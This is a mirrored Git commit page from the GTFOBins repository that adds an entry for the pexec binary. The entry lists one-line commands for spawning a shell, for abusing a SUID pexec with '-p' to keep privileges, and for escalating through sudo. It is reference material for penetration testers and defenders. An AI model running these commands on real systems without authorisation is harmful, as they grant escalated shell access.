mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
add pexec
install: apt-get install -y pexec man: https://manpages.ubuntu.com/manpages/trusty/man1/pexec.1.html
This commit is contained in:
parent
f4ec254e8c
commit
16e426e98c
9
_gtfobins/pexec.md
Normal file
9
_gtfobins/pexec.md
Normal file
@ -0,0 +1,9 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: pexec /bin/sh
|
||||||
|
suid:
|
||||||
|
- code: ./pexec /bin/sh -p
|
||||||
|
sudo:
|
||||||
|
- code: sudo pexec /bin/sh
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user